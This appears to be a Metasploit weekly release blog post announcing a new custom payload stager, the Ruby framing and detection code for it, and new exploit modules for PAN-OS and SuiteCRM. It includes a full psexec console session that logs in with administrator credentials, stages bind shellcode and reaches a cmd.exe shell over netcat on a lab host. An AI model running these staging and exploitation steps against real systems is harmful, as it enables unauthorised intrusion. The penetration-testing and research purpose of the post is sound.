
Metasploit Weekly Wrap-Up

## BYOS: Bring your own stager

![Metasploit Weekly Wrap-Up](https://blog.rapid7.com/content/images/2022/09/metasploit-ascii-1-2.png)

We try hard to make sure you have a great choice of fully functional payloads, but sometimes you might want to “branch” out on your own, and if that’s the case we’ve got you covered. In an attempt to make Metasploit play well with others, we’ve introduced a brand new payload type: “custom.” “Custom” payloads use Metasploit stagers to build a stager that will stage whatever shellcode you send it.

Got a third-party payload you want to run, like Sliver, or a payload that’s too big or has too many bad characters to use in an exploit? All you need to do is queue up your exploit of choice in Framework, select the custom payload type, set the `shellcode_file` option, and when you launch the exploit, Metasploit will use our stagers to upload and run your custom shellcode on the target.

While we have developed a handler that will send your custom code in, there’s no requirement to use it. You are welcome to write your own handler: the communication protocol is simply to prepend the shellcode size to the shellcode and send it; the custom payload stager allocates memory, copies the shellcode into it, and jumps into it.
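As an added illustration (not Metasploit’s own code), the Ruby below frames a stage the way the paragraph above describes, parses such a frame back the way a stager would consume it, and shows a defender-side check that recognises the framing in a captured server-to-client TCP payload. It assumes the size prefix is a 32-bit little-endian unsigned integer (the convention Metasploit’s Windows reverse_tcp stagers use; the page does not state the width), and the `MAX_STAGE` bound and the filler “shellcode” are constructed for the example.

```ruby
# Added example, not Metasploit's own code: length-prefixed stage framing
# as described in the wrap-up, plus a parser and a detection heuristic.
# Assumption: the size prefix is a 32-bit little-endian unsigned integer.

SIZE_BYTES = 4
MAX_STAGE  = 16 * 1024 * 1024  # sanity bound for the detector (assumed)

# Build the bytes a handler would send: [size][shellcode].
def frame_stage(shellcode)
  [shellcode.bytesize].pack('V') + shellcode.b
end

# Consume a frame the way the stager would. Returns the stage body, or
# raises if the stream is truncated or the declared size does not match.
def parse_stage(stream)
  stream = stream.b
  raise ArgumentError, 'stream shorter than size prefix' if stream.bytesize < SIZE_BYTES
  declared = stream.byteslice(0, SIZE_BYTES).unpack1('V')
  body = stream.byteslice(SIZE_BYTES, stream.bytesize - SIZE_BYTES)
  raise ArgumentError, "declared #{declared} bytes, got #{body.bytesize}" unless declared == body.bytesize
  body
end

# Defender-side heuristic for a captured server-to-client TCP payload:
# a plausible size prefix that exactly covers the remaining bytes is the
# signature of this staging protocol (an HTTP banner, for example, fails it).
def custom_stage_frame?(captured)
  captured = captured.b
  return false if captured.bytesize <= SIZE_BYTES
  declared = captured.byteslice(0, SIZE_BYTES).unpack1('V')
  declared > 0 && declared <= MAX_STAGE && declared == captured.bytesize - SIZE_BYTES
end

# Constructed sample: 19 filler bytes standing in for shellcode (not a real payload).
SAMPLE_SHELLCODE = ("\xCC" * 19).b
```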

Here’s an example using traditional “bind shellcode” to get a cmd.exe session on a Windows target:

```
msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                10.5.132.159     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass               v3Mpassword      no        The password for the specified username
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBUser               Administrator    no        The username to authenticate as

Payload options (windows/x64/custom/reverse_tcp):

   Name            Current Setting          Required  Description
   ----            ---------------          --------  -----------
   EXITFUNC        thread                   yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST           10.5.135.101             yes       The listen address (an interface may be specified)
   LPORT           4567                     yes       The listen port
   SHELLCODE_FILE  x64_shell_bind_4444.bin  no        Shellcode bin to launch

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 10.5.135.101:4567
[*] 10.5.132.159:445 - Connecting to the server...

[*] Sending stage (505 bytes) to 10.5.132.159
[+] Custom stage sent; session has been closed
[*] Custom session 1 opened (10.5.135.101:4567 -> 127.0.0.1) at 2022-09-08 15:29:02 -0500

[*] 10.5.132.159 - Custom session 1 closed.  Reason: User exit
[+] Custom stage sent; session has been closed
msf6 exploit(windows/smb/psexec) > exit
```

Now, we can just open a netcat session to the independent bind shell we started on the target:

```
[ruby-3.0.2@metasploit-framework](upstream-master) tmoose@ubuntu:~/rapid7/metasploit-framework$ nc 10.5.132.159 4444
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::1054:53:8f37:5615%11
   IPv4 Address. . . . . . . . . . . : 10.5.132.159
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.5.132.1

Tunnel adapter isatap.{A69D5981-18E2-43CF-982C-D844D6BB7D03}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

C:\Windows\system32>
```

## Module added to exploit OS Command Injection in PAN-OS

[Mikhail Klyuchnikov](), [Nikita Abramov](), UnD3sc0n0c1d0, and [jheysel-r7]() introduced a new module that exploits an OS Command Injection vulnerability, [CVE-2020-2038](), in PAN-OS. The vulnerability affects PAN-OS versions 9.0 up to 9.0.10, 9.1 up to 9.1.4, and 10.0 up to 10.0.1. PAN-OS is the operating system of one of the leading enterprise firewalls, the Palo Alto Networks next-generation firewall (NGFW). The [National Vulnerability Database]() rates the severity of this vulnerability as High (7.2), since authenticated administrators of the system are able to execute arbitrary commands with root privileges. The root cause is that the management API does not sufficiently filter input to its “op” request. An excellent writeup on exploiting this vulnerability and other similar vulnerabilities can be found on [PT Swarm]().

## New module content (4)

* [SuiteCRM authenticated SQL injection in export functionality]() by [Exodus Intelligence](), [Redouane NIBOUCHA](), and [jheysel-r7]() – This adds support for EIP-0f5d2d7f, a vulnerability in the `uid` parameter of the `index.php?entryPoint=export` page on SuiteCRM 7.x prior to 7.12.6 that allows for authenticated SQL injection. The module exploits this SQL injection vulnerability to extract the usernames and password hashes of SuiteCRM users, which can then be cracked offline to gain access to SuiteCRM.

* [Palo Alto Networks Authenticated Remote Code Execution]() by [Mikhail Klyuchnikov](), [Nikita Abramov](), UnD3sc0n0c1d0, and [jheysel-r7](), which exploits [CVE-2020-2038]() – This adds an exploit module that leverages an OS Command Injection vulnerability in the PAN-OS management interface, versions 10.0 to 10.0.1, versions 9.1.0 to 9.1.4, and versions 9.0.0 to 9.0.10. The vulnerability is identified as CVE-2020-2038 and allows authenticated administrators to execute arbitrary OS commands with root privileges.

* [#16521]() from [bwatters-r7]() – This adds a 32-bit and 64-bit custom stage Windows payload. The custom stage allows users to provide their own custom executable code to be delivered as the payload stage in place of Meterpreter, Shell and other Metasploit-provided stages.

* [#16906]() from [bcoles]() – This improves the `post/windows/gather/enum_snmp` module with shell and PowerShell session support, and fixes issues that low-privileged sessions would run into while reading the registry.

## Enhancements and features (5)

* [#16911]() from [bcoles]() – This adds support for non-Meterpreter sessions and for WOW64 Meterpreter sessions to the `post/windows/gather/enum_ms_product_keys` module.
* [#16929]() from [bcoles]() – The `post/windows/gather/enum_services` module has been updated to support non-Meterpreter sessions, to fix some bugs, and to clean up the code. Additionally documentation has been added on how to use the module.
* [#16930]() from [bcoles]() – This updates the `scripts/resource/dev_checks.rc` resource script to fix issues and add additional module checks.
* [#16953]() from [bcoles]() – The `enum_domain` script has been updated to support PowerShell and shell sessions, and its documentation and code have been cleaned up.
* [#17008]() from [EmilioPanti]() – `rpc_core.rb` has been updated so that it now reports the number of evasion modules within Metasploit. Previously this statistic wasn’t being reported, whilst other statistics like the number of exploit modules, auxiliary modules, and payloads were.

## Bugs fixed (5)

* [#16928]() from [bcoles]() – Multiple bugs have been fixed in the `Msf::Post::Windows::Service` mixin. Additionally, several methods have been adjusted within this mixin so that the data types they use or return are consistent.
* [#16998]() from [adfoster-r7]() – Fixes a crash in modules using the IAX2 client.
* [#17013]() from [zeroSteiner]() – This PR enhances `exploit/multi/http/jenkins_script_console` to handle changes to the login process for Jenkins newer than version 2.246.
* [#17014]() from [adfoster-r7]() – This fixes the `exploit/multi/php/ignition_laravel_debug_rce` module to use the default HTTP timeout for the check method. Without this, the check method would yield false negatives on slower connections.
* [#17018]() from [adfoster-r7]() – This fixes the `route add` command to use a sensible default netmask.

## Get it

As always, you can update to the latest Metasploit Framework with `msfupdate`
and you can get more details on the changes since the last blog post from
GitHub:

* [Pull Requests 6.2.17…6.2.18]()
* [Full diff 6.2.17…6.2.18]()

If you are a `git` user, you can clone the [Metasploit Framework repo]() (master branch) for the latest.
To install fresh without using git, you can use the open-source-only [Nightly Installers]() or the
[binary installers]() (which also include the commercial edition).
